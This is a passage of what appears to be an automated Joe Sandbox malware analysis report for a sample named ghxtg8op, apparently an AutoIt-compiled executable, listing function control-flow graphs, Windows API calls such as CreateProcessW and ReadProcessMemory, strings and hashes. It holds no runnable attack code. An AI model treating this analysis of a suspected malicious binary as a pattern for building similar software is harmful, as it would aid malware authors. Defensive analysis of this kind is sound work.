d65527-d65529 1206->1214 1207->1214 1208->1213 1215 d65579-d6557e 1208->1215 1216 d655a4-d655a8 1209->1216 1217 d6553f-d6554b call d646e6 call d70e5b 1209->1217 1210->1209 1211->1212 1212->1216 1218 d654e6-d654ff call d70cc8 1212->1218 1213->1176 1214->1209 1215->1216 1219 d65580-d65591 1215->1219 1220 d655ba-d655c5 call d68b28 1216->1220 1221 d655aa-d655b7 call d62de0 1216->1221 1233 d65550-d65555 1217->1233 1232 d65562-d6556b 1218->1232 1224 d65594-d65596 1219->1224 1220->1188 1221->1220 1224->1194 1224->1195 1232->1224 1234 d655dc-d655e0 1233->1234 1235 d6555b-d6555e 1233->1235 1234->1213 1235->1202 1236 d65560 1235->1236 1236->1232
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                            • String ID:
                            • API String ID: 1559183368-0
                            • Opcode ID: 2ae4adc1162bedfe6bc9a4b740345a455ff32de3de61d0c655ced6f3c4ec0989
                            • Instruction ID: d8ba2ff9678fc9d46f31e3e01224b78ba18f6ad96c415bd17a3b6fc5e97f9729
                            • Opcode Fuzzy Hash: 2ae4adc1162bedfe6bc9a4b740345a455ff32de3de61d0c655ced6f3c4ec0989
                            • Instruction Fuzzy Hash: CD51B870A00B05DBCB24CF69E84466E77A6EF40321F288769F876962D8DB71DDD08B70
                            Function 00D4686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2036 d4686a-d46891 call d44ddd 2039 d46897-d468a5 call d44ddd 2036->2039 2040 d7e031-d7e041 call da955b 2036->2040 2039->2040 2047 d468ab-d468b1 2039->2047 2043 d7e046-d7e048 2040->2043 2045 d7e067-d7e0af call d60db6 2043->2045 2046 d7e04a-d7e04d call d44e4a 2043->2046 2056 d7e0d4 2045->2056 2057 d7e0b1-d7e0bb 2045->2057 2051 d7e052-d7e061 call da42f8 2046->2051 2050 d468b7-d468d9 call d46a8c 2047->2050 2047->2051 2051->2045 2059 d7e0d6-d7e0e9 2056->2059 2060 d7e0cf-d7e0d0 2057->2060 2061 d7e260-d7e271 call d62d55 call d44e4a 2059->2061 2062 d7e0ef 2059->2062 2063 d7e0d2 2060->2063 2064 d7e0bd-d7e0cc 2060->2064 2073 d7e273-d7e283 call d47616 call d45d9b 2061->2073 2065 d7e0f6-d7e0f9 call d47480 2062->2065 2063->2059 2064->2060 2069 d7e0fe-d7e120 call d45db2 call da73e9 2065->2069 2080 d7e134-d7e13e call da73d3 2069->2080 2081 d7e122-d7e12f 2069->2081 2087 d7e288-d7e2b8 call d9f7a1 call d60e2c call d62d55 call d44e4a 2073->2087 2089 d7e140-d7e153 2080->2089 2090 d7e158-d7e162 call da73bd 2080->2090 2083 d7e227-d7e237 call d4750f 2081->2083 2083->2069 2092 d7e23d-d7e25a call d4735d 2083->2092 2087->2073 2089->2083 2097 d7e176-d7e180 call d45e2a 2090->2097 2098 d7e164-d7e171 2090->2098 2092->2061 2092->2065 2097->2083 2105 d7e186-d7e19e call d9f73d 2097->2105 2098->2083 2111 d7e1c1-d7e1c4 2105->2111 2112 d7e1a0-d7e1bf call d47de1 call d45904 2105->2112 2113 d7e1c6-d7e1e1 call d47de1 call d46839 call d45904 2111->2113 2114 d7e1f2-d7e1f5 2111->2114 2137 d7e1e2-d7e1f0 call d45db2 2112->2137 2113->2137 2118 d7e1f7-d7e200 call d9f65e 2114->2118 2119 d7e215-d7e218 call da737f 2114->2119 2118->2087 2130 d7e206-d7e210 call d60e2c 2118->2130 2124 d7e21d-d7e226 call d60e2c 2119->2124 2124->2083 2130->2069 2137->2124
                            APIs
                              • Part of subcall function 00D44DDD: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D44E0F
                            • _free.LIBCMT ref: 00D7E263
                            • _free.LIBCMT ref: 00D7E2AA
                              • Part of subcall function 00D46A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00D46BAD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _free$CurrentDirectoryLibraryLoad
                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                            • API String ID: 2861923089-1757145024
                            • Opcode ID: 420e196265a87edfc225ab749a7c4ea142144fde0953fe293c7d12f44d5bbc5a
                            • Instruction ID: ae0ca498496fb65b94307cb7f41618eea0cbce943fdf1ca67218ed38fc737370
                            • Opcode Fuzzy Hash: 420e196265a87edfc225ab749a7c4ea142144fde0953fe293c7d12f44d5bbc5a
                            • Instruction Fuzzy Hash: CB9160719002199FCF04EFA4CC919EDB7B9FF09310F148469F81AAB2A2EB719945CB70
                            Function 00D435B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExW.KERNEL32 ref: 00D435D4
                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00D435F5
                            • RegCloseKey.ADVAPI32(00000000), ref: 00D43617
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID: Control Panel\Mouse
                            • API String ID: 3677997916-824357125
                            • Opcode ID: ed1829bc00798a8ecbda3036d878ed25fc3d76af8036f999efcb163d05edc541
                            • Instruction ID: e46b1f365048463a0c9b2a32740bf2042e3a3a60c745d70dc32977cb87778b23
                            • Opcode Fuzzy Hash: ed1829bc00798a8ecbda3036d878ed25fc3d76af8036f999efcb163d05edc541
                            • Instruction Fuzzy Hash: 3E11577161020ABFDB209F68DC80EEEBBB9EF04740F128469F805D7210E2719F40ABB0
                            Function 00DA955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D44EE5: _fseek.LIBCMT ref: 00D44EFD
                              • Part of subcall function 00DA9734: _wcscmp.LIBCMT ref: 00DA9824
                              • Part of subcall function 00DA9734: _wcscmp.LIBCMT ref: 00DA9837
                            • _free.LIBCMT ref: 00DA96A2
                            • _free.LIBCMT ref: 00DA96A9
                            • _free.LIBCMT ref: 00DA9714
                              • Part of subcall function 00D62D55: HeapFree.KERNEL32(00000000,00000000), ref: 00D62D69
                              • Part of subcall function 00D62D55: GetLastError.KERNEL32(00000000,?,00D69A24), ref: 00D62D7B
                            • _free.LIBCMT ref: 00DA971C
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                            • String ID:
                            • API String ID: 1552873950-0
                            • Opcode ID: f859ffca5ba2b4a0eea839192ff175ec825e65a9e51aeda56b8df4c59dab3bfe
                            • Instruction ID: 6e187475401ebaa6de85411c421647379216d3df3cc4a7ff6e26a9b3cecd2003
                            • Opcode Fuzzy Hash: f859ffca5ba2b4a0eea839192ff175ec825e65a9e51aeda56b8df4c59dab3bfe
                            • Instruction Fuzzy Hash: 6B514EB1D14258ABDF259F64DC81BAEBB79EF49300F1004AEF609A3241DB715A80CF78
                            Function 00D6470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                            • String ID:
                            • API String ID: 2782032738-0
                            • Opcode ID: b86a2bf7579e7a03abf9a7817f5cbb14d02551d5049f523e8648adc105e96e29
                            • Instruction ID: e9588ce0e9dd0195ec21623012a1c0105a1b70ba7336dc9142b4136726d509a5
                            • Opcode Fuzzy Hash: b86a2bf7579e7a03abf9a7817f5cbb14d02551d5049f523e8648adc105e96e29
                            • Instruction Fuzzy Hash: 0E41C675B00746DFDB18DFA9C8909AE7BA6EF46360B28853DE855C7640DB70DD408BB0
                            Function 00D47285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00D7EA39
                            • GetOpenFileNameW.COMDLG32(?), ref: 00D7EA83
                              • Part of subcall function 00D44750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D44743,?,?,00D437AE,?), ref: 00D44770
                              • Part of subcall function 00D60791: GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,00D472BD,00000001,00E06290,?,00D43BBB,00E052F8,00E052E0,?,?), ref: 00D607B0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Name$Path$FileFullLongOpen_memset
                            • String ID: X
                            • API String ID: 3777226403-3081909835
                            • Opcode ID: 5190213df8bb60b3a0f2e44ee449a00a098afddd480a4485f5e638a15d2fc2fe
                            • Instruction ID: 50716638cb3b61cf67d1df5335fe78f4147436375996fad3b27f69d667342b3a
                            • Opcode Fuzzy Hash: 5190213df8bb60b3a0f2e44ee449a00a098afddd480a4485f5e638a15d2fc2fe
                            • Instruction Fuzzy Hash: 7321C031A002889BCF419F94C845BEE7BF8EF49714F04805AE548AB241DBB499899FB2
                            Function 00DA8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __fread_nolock_memmove
                            • String ID: EA06
                            • API String ID: 1988441806-3962188686
                            • Opcode ID: 87ed7ea9b85f1151f66fb07ef5325c90f24f063065450869cb79a52c510abe04
                            • Instruction ID: 82d6f1df9dd1ef3ae6c5baa9c569d807776eb97199d48e76fa57bd275de73d9a
                            • Opcode Fuzzy Hash: 87ed7ea9b85f1151f66fb07ef5325c90f24f063065450869cb79a52c510abe04
                            • Instruction Fuzzy Hash: 0201F9718042187FDF18CAA8DC16EFE7BF8DB11311F00419AF552D2181E875E6089770
                            Function 00DA98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                            Download Yara Rule
                            APIs
                            • GetTempPathW.KERNEL32(00000104,?), ref: 00DA98F8
                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00DA990F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Temp$FileNamePath
                            • String ID: aut
                            • API String ID: 3285503233-3010740371
                            • Opcode ID: 438e9368b16d28879891f21cc79f98250cdbb29b3e5fb2c5627648ae16c359bb
                            • Instruction ID: 28c0d1128cb5ba81e0ec9d07bd68d72624943c4c3c253c66e4688f473872cd97
                            • Opcode Fuzzy Hash: 438e9368b16d28879891f21cc79f98250cdbb29b3e5fb2c5627648ae16c359bb
                            • Instruction Fuzzy Hash: 94D05B7554030E6BDB509B90EC0DFDAB73CD704704F0042B1BB54D1191D97055589BA5
                            Function 00992DA8 Relevance: 5.2, APIs: 3, Instructions: 720processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessW.KERNEL32(?,00000000), ref: 009935D5
                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0099361B
                            Memory Dump Source
                            • Source File: 00000005.00000002.486369482.0000000000991000.00000040.00000020.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_991000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Process$CreateMemoryRead
                            • String ID:
                            • API String ID: 2726527582-0
                            • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                            • Instruction ID: 6b99b8c96177a8cd3c26c733b13aacdcc51d4e936474a469f55ad39951414537
                            • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                            • Instruction Fuzzy Hash: 82620D70A14258DBEB24DFA4C841BDEB376EF58700F1091A9E10DEB390E7799E81CB59
                            Function 00DBCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d205ca62c79f8209260e885c3bb693e60dd8c488d91215edd9c4d170ab14c494
                            • Instruction ID: 70c6f3cf963c7eeabfc41cfc05061f1d31421c5e14c2a6bdad285c747df13ae7
                            • Opcode Fuzzy Hash: d205ca62c79f8209260e885c3bb693e60dd8c488d91215edd9c4d170ab14c494
                            • Instruction Fuzzy Hash: ACF12675608301DFCB14DF29C480A6ABBE5FF88314F14896EF89A9B251D730E945CFA2
                            Function 00D4434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00D44370
                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D44415
                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D44432
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: IconNotifyShell_$_memset
                            • String ID:
                            • API String ID: 1505330794-0
                            • Opcode ID: d18314135eda73f3c1a8e58272d5adabb510e53ace3219c6d31a6dc4085fc205
                            • Instruction ID: e10861f5de96550c42d6375910ff2492a0f375538a52fd489ecc544f79ddf454
                            • Opcode Fuzzy Hash: d18314135eda73f3c1a8e58272d5adabb510e53ace3219c6d31a6dc4085fc205
                            • Instruction Fuzzy Hash: 49316FB15057018FD721DF65D88479BBBF8FF48708F04092EF59A92251E771A988CBA2
                            Function 00D6571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __FF_MSGBANNER.LIBCMT ref: 00D65733
                              • Part of subcall function 00D6A16B: __NMSG_WRITE.LIBCMT ref: 00D6A192
                              • Part of subcall function 00D6A16B: __NMSG_WRITE.LIBCMT ref: 00D6A19C
                            • __NMSG_WRITE.LIBCMT ref: 00D6573A
                              • Part of subcall function 00D6A1C8: GetModuleFileNameW.KERNEL32(00000000,00E033BA,00000104,?,00000001,00000000), ref: 00D6A25A
                              • Part of subcall function 00D6A1C8: ___crtMessageBoxW.LIBCMT ref: 00D6A308
                              • Part of subcall function 00D6309F: ___crtCorExitProcess.LIBCMT ref: 00D630A5
                              • Part of subcall function 00D6309F: ExitProcess.KERNEL32 ref: 00D630AE
                              • Part of subcall function 00D68B28: __getptd_noexit.LIBCMT ref: 00D68B28
                            • RtlAllocateHeap.NTDLL(00900000,00000000,00000001,00000000,?,?,?,00D60DD3,?), ref: 00D6575F
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                            • String ID:
                            • API String ID: 1372826849-0
                            • Opcode ID: d28181a7f106ec51f917d952df87015243c653700b95b9114460bee8cadf5997
                            • Instruction ID: 0cf574615b8e94ae8615ae0a094d3fe73f07139849a0354993ee9aa936658a1b
                            • Opcode Fuzzy Hash: d28181a7f106ec51f917d952df87015243c653700b95b9114460bee8cadf5997
                            • Instruction Fuzzy Hash: 2501F131240B02DFD6107B7AFC92A2E738CCB92362F140136F556AA2D6DE709C814A70
                            Function 00DA98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00DA98BB
                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00DA9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00DA98D1
                            • CloseHandle.KERNEL32(00000000), ref: 00DA98D8
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleTime
                            • String ID:
                            • API String ID: 3397143404-0
                            • Opcode ID: 074d2d8c42667c56f5d207dd1473d1c3c36e744ee1a33b6165c261ccd30e8d05
                            • Instruction ID: ff231efca1a958d21d3badff3d358a7c12de85db8562642e3f324b2a536f22a8
                            • Opcode Fuzzy Hash: 074d2d8c42667c56f5d207dd1473d1c3c36e744ee1a33b6165c261ccd30e8d05
                            • Instruction Fuzzy Hash: 01E08632141316B7D7211B64EC09FCA7B1AAB06760F144220FB14A91E087B1251197A8
                            Function 00D4A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID: CALL
                            • API String ID: 0-4196123274
                            • Opcode ID: 267b93036c8f1e705f69591db8bcf7dd507757f3c993bdd4182077b8b7e7a86c
                            • Instruction ID: a50279f865a81f42a86d77d9ece15174a49e9419e69fa0a88080afd14a948be6
                            • Opcode Fuzzy Hash: 267b93036c8f1e705f69591db8bcf7dd507757f3c993bdd4182077b8b7e7a86c
                            • Instruction Fuzzy Hash: 9A224874508201DFDB24DF18C495A6ABBE1FF84314F18896DF89A9B262D731EC45CBA2
                            Function 00D44C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: EA06
                            • API String ID: 4104443479-3962188686
                            • Opcode ID: d09c17ef4ed2d36f4849ea13f2be61c4f3fd74992692385f4b66dd0393a095b1
                            • Instruction ID: a1df177486601a2bb95b693f8b68e4b7e59af5cfd302f892985720f3ccfc29f2
                            • Opcode Fuzzy Hash: d09c17ef4ed2d36f4849ea13f2be61c4f3fd74992692385f4b66dd0393a095b1
                            • Instruction Fuzzy Hash: 69412A21E041586BDF219B6498917BF7FA2EF45310F6C4475FCC6AB286D7209DC487B2
                            Function 00D447D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                            • IsThemeActive.UXTHEME ref: 00D44834
                              • Part of subcall function 00D6336C: __lock.LIBCMT ref: 00D63372
                              • Part of subcall function 00D6336C: DecodePointer.KERNEL32(00000001,?,00D44849,00D97C74), ref: 00D6337E
                              • Part of subcall function 00D6336C: EncodePointer.KERNEL32(?,?,00D44849,00D97C74), ref: 00D63389
                              • Part of subcall function 00D448FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000,00000000,?,0092A2E8,?,00D4485C), ref: 00D44915
                              • Part of subcall function 00D448FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?,0092A2E8,?,00D4485C), ref: 00D4492A
                              • Part of subcall function 00D43B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D43B68
                              • Part of subcall function 00D43B3A: IsDebuggerPresent.KERNEL32 ref: 00D43B7A
                              • Part of subcall function 00D43B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E052F8,00E052E0,?,?), ref: 00D43BEB
                              • Part of subcall function 00D43B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00D43C6F
                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D44874
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
